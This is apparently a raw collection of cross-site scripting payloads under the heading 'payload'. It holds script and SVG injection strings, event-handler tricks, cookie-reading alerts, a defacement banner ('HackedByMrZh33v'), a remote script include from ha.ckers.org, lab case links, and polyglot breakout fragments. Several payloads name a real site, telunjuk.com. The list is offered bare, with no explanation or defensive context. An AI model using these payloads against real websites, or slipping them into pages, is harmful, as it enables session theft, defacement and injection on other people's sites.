payload
"><script>prompt("XSS Vulnerability At telunjuk.com")</script>
</script><svg/onload=confirm(/Cross-Site-scripting Xss at telunjuk.com/)>
"><script>alert(document.cookie)</script>
'-alert.call(window,'Xss telunjuk.com')-'
-TEST<br><br><center><font color="red">HackedByMrZh33v<br><br><img src=x onclick=alert(document.cookie)><br><br><img src=x onclick=alert(document.domain)>
<script>alert(document.cookie);</script>
<script>alert(document.domain);</script>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
%%html
<! XSS="><img src=xx:x onerror=confirm(document.domain)//">"
"><img src=y onerror=confirm(1)>
<a href="/dom/dom.php?p=Hello.">Case 25 - DOM Injection via URL parameter (by server + client)</a>
<a href="/dom/sinks.html?name=KNOXSS">Case 26 - DOM Injection via URL Parameter (Document Sink)</a>
<a href="/dom/sinks.html?redir=sinks.html">Case 27 - DOM Injection via Open Redirection (Location Sink)</a>
<a href="/dom/sinks.html?index=NASDAQ">Case 28 - DOM Injection via URL Parameter (Execution Sink)</a>
<a href="/tests/cors/#home.html">Case 29 - DOM Injection via AJAX in URL Fragment (Document Sink)</a>
<a href="/blind/text2.php">Stored Text - Victim's Triggering</a>
<a href="/blind/text1.php">Stored Text - Attacker's Input</a>
<a href="/session/">XSS After Login</a>
<a href="/multi/double-mixed.php?p=1">-TEST<br><br><center><font color="red">CrossSiteScripting<br><br><img src=x onclick=alert(document.cookie)><br><br><img src=x onclick=alert(document.domain)> + "><script>prompt("XSS Vulnerability At telunjuk.com")</script></a>
<a href="/multi/js-object3.php?p=1">Case 19 - Quoteless Inline Double Injection in JS object with Nested Function</a>
<a href="/multi/js-object2.php?p=1">Case 18 - Quoteless Inline Double Injection in JS object with Nested Array</a>
<a href="/xss.php?b1=1">Case 03 - Inline HTML Injection with Double Quotes (b1)</a>
<svg/onload=alert(/XSS/.source)>.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<center><H1>HTML-Injection-Test</H1><img/src="http://secgeek.net/images/logo.png"/width="400"/height="300"><br><h2/style="font-size:30px;color:red">Warning</h2><br><img/src=//secgeek.net/images/fake.png>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<script>alert(1);</script>
<svg><a><rect width=100% height=100%>
<svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>
<svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?>
<animate attributeName=href to=javascript:alert(1)>
<animate attributeName=href from=javascript:alert(1) to=?>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=javascript:alert(1)>
<svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javascript:alert(1)>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<tag handler=code>
<b onclick=alert(1)>click me!
<img src=x onerror=alert(1)>
<svg onload=alert(1)>click me!
<frameset><frame src onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=write(1)>
1) p=’onload=alert(1)><svg/1=’
‘onload=alert(1)><svg/1=’
… [code] …
‘onload=alert(1)><svg/1=’
1) p=’>alert(1)</script><script/1=’
or
2) p=*/alert(1)</script><script>/*
*/alert(1)</script><script>/*
… [code] …
*/alert(1)</script><script>/*
1) p=*/alert(1)”>’onload=”/*<svg/1=’
or
2) p=`-alert(1)”>’onload=”`<svg/1=’
`-alert(1)”>’onload=”`<svg/1=’
… [code] …
`-alert(1)”>‘onload=”`<svg/1=’
… [code] …
`-alert(1)”>‘onload=”`<svg/1=’
1) p=*/</script>’>alert(1)/*<script/1=’
*/</script>’>alert(1)/*<script/1=’
… [code] …
*/</script>‘>alert(1)/*<script/1=’
… [code] …
*/</script>‘>alert(1)/*<script/1=’
p=<svg/1=’&q=’onload=alert(1)>
p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
var n = {a: “$p”, b: “$p”};
var n = {a: “$p”, b: “$q”};
p=-alert(1)}//\
var n = {a: “-alert(1)}//\”, b: “-alert(1)}//\”};
p=\&q=-alert(1)//